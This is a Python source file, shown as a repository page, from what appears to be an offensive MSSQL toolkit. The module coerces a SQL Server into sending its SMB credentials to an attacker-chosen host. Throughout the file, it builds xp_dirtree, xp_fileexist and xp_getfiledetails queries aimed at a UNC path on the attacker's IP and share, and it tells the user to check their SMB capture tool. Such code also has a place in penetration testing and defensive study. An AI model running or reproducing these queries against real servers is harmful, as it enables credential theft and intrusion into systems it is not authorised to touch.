-
Notifications
You must be signed in to change notification settings - Fork 138
/
SMBAuthenticationCapture.py
150 lines (134 loc) · 6.56 KB
/
SMBAuthenticationCapture.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
#!/usr/bin/python
# -*- coding: utf-8 -*-
import logging
from Mssql import Mssql
from Utils import ErrorClass, checkOptionsGivenByTheUser
from Constants import *
class SMBAuthenticationCapture (Mssql):
'''
To cature a SMB AUthentication
'''
#CONSTANTES
REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE = "xp_dirtree '\\\\{0}\{1}'" #{0}=ip, {1}=sharename
REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST = "xp_fileexist '\\\\{0}\{1}'" #{0}=ip, {1}=sharename
REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS = "xp_getfiledetails'\\\\{0}\{1}'" #{0}=ip, {1}=sharename
def __init__(self, args, localIp, shareName=DEFAULT_SHARE_NAME):
'''
Constructor
'''
Mssql.__init__(self, args=args)
self.localIp = localIp
self.shareName = shareName
def captureSMBAuthenticationViaXpDirtree (self):
'''
Capture SMB Authentication via XP_DIRTREE
Return True if no error
else: return error
'''
logging.info("Capturing SMB Authentication via XP_DIRTREE...")
data = self.executeRequest(self.REQ_SMB_AUTHENTICATION_VIA_XP_DIRTREE.format(self.localIp, self.shareName),ld=['subdirectory','depth'])
if isinstance(data,Exception):
logging.debug("Impossible to capture the SMB authentication: {0}".format(data))
else:
logging.info("No error during the running: you could capture the SMB authentication")
return True
def captureSMBAuthenticationViaXpFileexist (self):
'''
Capture SMB Authentication via XP_FILEEXIST
Return True if no error
else: return error
'''
logging.info("Capturing SMB Authentication via XP_FILEEXIST...")
data = self.executeRequest(self.REQ_SMB_AUTHENTICATION_VIA_XP_FILEEXIST.format(self.localIp, self.shareName),ld=['File Exists','File is a Directory','Parent Directory Exists'])
if isinstance(data,Exception):
logging.debug("Impossible to capture the SMB authentication: {0}".format(data))
else:
logging.info("No error during the running: you could capture the SMB authentication")
return True
def captureSMBAuthenticationViaXpGetFileDetails (self):
'''
Normally, Windows 2000 only
Capture SMB Authentication via XP_GETFILEDETAILS
Return True if no error
else: return error
'''
logging.info("Capturing SMB Authentication via XP_GETFILEDETAILS...")
data = self.executeRequest(self.REQ_SMB_AUTHENTICATION_VIA_XP_GETFILEDETAILS.format(self.localIp, self.shareName),ld=['1','2','3','4','5','6','7','8','9'])
if isinstance(data,Exception):
if self.isThe2000Version() == False: logging.debug("Impossible to capture the SMB authentication via XP_GETFILEDETAILS because you are not on a MSSQL 2000: {0}".format(data))
else: logging.debug("Impossible to capture the SMB authentication: {0}".format(data))
else:
logging.info("No error during the running: you could capture the SMB authentication")
return True
def tryToCaptureASmbAuthentication (self):
'''
Capture SMB authentication
Return True if a method is ok
otherwise return False
'''
logging.info("Test all methods allowing to capture a SMB authentication...")
data = self.captureSMBAuthenticationViaXpDirtree()
if data != True:
data = self.captureSMBAuthenticationViaXpFileexist()
elif data != True:
data = self.captureSMBAuthenticationViaXpGetFileDetails()
elif data != True :
logging.info("No method allows to capture a SMB authentication")
return False
return True
def testAll (self):
'''
Test all functions
'''
self.args['print'].subtitle("Can you capture a SMB authentication ?")
status = self.tryToCaptureASmbAuthentication()
if status == False:
self.args['print'].badNews("KO")
else :
self.args['print'].unknownNews("? (perhaps)")
def runSMBAuthenticationCaptureModule(args):
'''
Run the SMBAuthenticationCapture module
'''
if checkOptionsGivenByTheUser(args,["capture","xp-dirtree-capture","xp-fileexist-capture","xp-getfiledetails-capture"],checkAccount=True) == False : return EXIT_MISS_ARGUMENT
if args["capture"] != None:
smbAuthenticationCapture = SMBAuthenticationCapture(args,args['capture'][0],args['share-name'][0])
elif args["xp-dirtree-capture"] != None:
smbAuthenticationCapture = SMBAuthenticationCapture(args,args["xp-dirtree-capture"][0],args['share-name'][0])
elif args["xp-fileexist-capture"] != None:
smbAuthenticationCapture = SMBAuthenticationCapture(args,args["xp-fileexist-capture"][0],args['share-name'][0])
elif args["xp-getfiledetails-capture"] != None:
smbAuthenticationCapture = SMBAuthenticationCapture(args,args["xp-getfiledetails-capture"][0],args['share-name'][0])
else:
smbAuthenticationCapture = SMBAuthenticationCapture(args, "127.0.0.1", args['share-name'][0])
smbAuthenticationCapture.connect()
if args["test-module"] == True: smbAuthenticationCapture.testAll()
if args["capture"] != None:
args['print'].title("Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method")
status = smbAuthenticationCapture.tryToCaptureASmbAuthentication()
if status == True:
args['print'].unknownNews("You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !")
else :
args['print'].badNews("You can't capture a SMB authentication with these methods")
elif args["xp-dirtree-capture"] != None:
args['print'].title("Try to capture a SMB authentication with the xp_dirtree method only")
status = smbAuthenticationCapture.captureSMBAuthenticationViaXpDirtree()
if status == True:
args['print'].unknownNews("You can perhaps capture a SMB authentication with the xp_dirtree method. Check your SMB capture tool !")
else :
args['print'].badNews("You can't capture a SMB authentication with the xp_dirtree method")
elif args["xp-fileexist-capture"] != None:
args['print'].title("Try to capture a SMB authentication with the xp_fileexist method only")
status = smbAuthenticationCapture.captureSMBAuthenticationViaXpFileexist()
if status == True:
args['print'].unknownNews("You can perhaps capture a SMB authentication with the xp_fileexist method. Check your SMB capture tool !")
else :
args['print'].badNews("You can't capture a SMB authentication with the xp_fileexist method")
elif args["xp-getfiledetails-capture"] != None:
args['print'].title("Try to capture a SMB authentication with the xp_getfiledetails method only")
status = smbAuthenticationCapture.captureSMBAuthenticationViaXpGetFileDetails()
if status == True:
args['print'].unknownNews("You can perhaps capture a SMB authentication with the xp_getfiledetails method. Check your SMB capture tool !")
else :
args['print'].badNews("You can't capture a SMB authentication with the xp_getfiledetails method")
smbAuthenticationCapture.closeConnection()